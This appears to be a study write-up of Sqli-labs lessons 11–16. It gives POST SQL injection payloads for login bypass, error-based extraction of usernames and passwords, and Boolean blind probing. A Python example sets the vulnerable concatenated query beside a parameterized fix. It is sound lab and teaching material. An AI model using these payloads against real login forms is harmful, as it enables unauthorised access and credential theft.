Notes from working through Sqli-labs. The earlier notes cover the content in more detail; the following records only the key points.
Less11: POST injection, with echo and error messages
From Less11 onward the injection is via POST, and the page has two input boxes. Use Firefox's F12 developer tools to view the submitted parameters:
uname=1&passwd=1&submit=submit
Test the uname parameter:
uname='&passwd=1&submit=submit
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near "and password=" LIMIT 0,1 ' at line 1
This shows that the statement has the form where a='abc'.
Finally, the login is bypassed with an always-true condition:
uname=' or 1=1 limit 1,1-- a&passwd=&submit=submit
Less12:
Almost the same as Less11, except that the closure becomes ("xxx")
uname=") or 1=1 limit 1,1-- a&passwd=&submit=submit
Less13: POST injection, no echo, error messages shown
Same as the double injection in Less5; just pay attention to the closure.
uname=') union (select count(*), concat(@@version, floor(rand(0)*2)) a from information_schema.tables group by a)-- a&passwd=&submit=submit
Get the username and password:
uname=') union (select count(*), concat((select concat(username, '/', password) from users limit 0,1), floor(rand(0)*2)) a from information_schema.tables group by a)-- a&passwd=&submit=submit
Less14:
Almost the same as Less13, except that the closure becomes "a"
uname=" union (select count(*), concat((select concat(username, '/', password) from users limit 0,1), floor(rand(0)*2)) a from information_schema.tables group by a)-- a&passwd=&submit=submit
Less15: POST injection, Boolean blind
The result differs depending on whether the login succeeds or fails, so Boolean blind injection is possible. With statements like the following, you need to test one character at a time.
uname=' or length(@@version)>10-- a&passwd=&submit=submit
uname=' or ascii(substr(@@version,1,1))>64-- a&passwd=&submit=submit
I'm really tired of trying.
Less16:
The same as Less15, only the closure changes (PS: the name says time-based blind, but that feels completely useless)
uname=") or ascii(substr(@@version,1,1))>0-- a&passwd=&submit=submit
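The login bypass from Less11 and the ('x') closure from Less13, seen from the defender's side. This is an added example, not code from Sqli-labs or from these notes: it assumes an in-memory SQLite table with constructed users in place of the lab's MySQL (the function and table names are made up for the illustration), and puts the concatenated query next to a parameterized one.

```python
import sqlite3

# Constructed sample data; plaintext passwords mirror the lab, not good practice.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                   [("admin", "s3cret"), ("alice", "hunter2")])
    return db

# Quoting styles seen in the notes: Less11 wraps input as 'x', Less13 as ('x').
CLOSURES = {"less11": "'{}'", "less13": "('{}')"}

def login_concat(db, style, uname, passwd):
    """Vulnerable: user input is pasted into the SQL text."""
    wrap = CLOSURES[style]
    sql = ("SELECT username FROM users WHERE username=" + wrap.format(uname) +
           " AND password=" + wrap.format(passwd) + " LIMIT 0,1")
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error as exc:
        # Echoing the database error is what reveals the closure to the client.
        return "SQL error: " + str(exc)
    return row[0] if row else None

def login_param(db, uname, passwd):
    """Hardened: values are bound as parameters, so quotes are only data."""
    row = db.execute(
        "SELECT username FROM users WHERE username=? AND password=? LIMIT 1",
        (uname, passwd)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_db()
    payloads = {"less11": "' or 1=1 limit 1,1-- a",
                "less13": "') or 1=1 limit 1,1-- a"}
    for style, p in payloads.items():
        print(style, "concat:", login_concat(db, style, p, ""),
              "| param:", login_param(db, p, ""))
    print("quote probe:", login_concat(db, "less11", "'", "1"))
```

With bound parameters the same inputs return no row and raise no syntax error, whichever closure the original query used.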
"Sqli-labs" Less11~less16